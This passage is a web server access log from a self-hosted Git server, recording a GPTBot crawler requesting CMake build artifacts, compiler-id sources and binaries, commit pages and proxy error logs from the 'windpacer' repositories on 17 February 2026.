AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33367] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33369] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43097] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43095] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43096] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9976] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9979] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9977] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42446] [Gzip 19.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42446] [Gzip 19.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9969] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9969] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42446] [Gzip 19.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21730] [Gzip 28.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11051] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log?display=source" [Client 74.7.227.38] [Length 14418] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log?display=source" [Client 74.7.227.38] [Length 16229] [Gzip 7.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11011] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11009] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11010] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 10986] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11008] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr 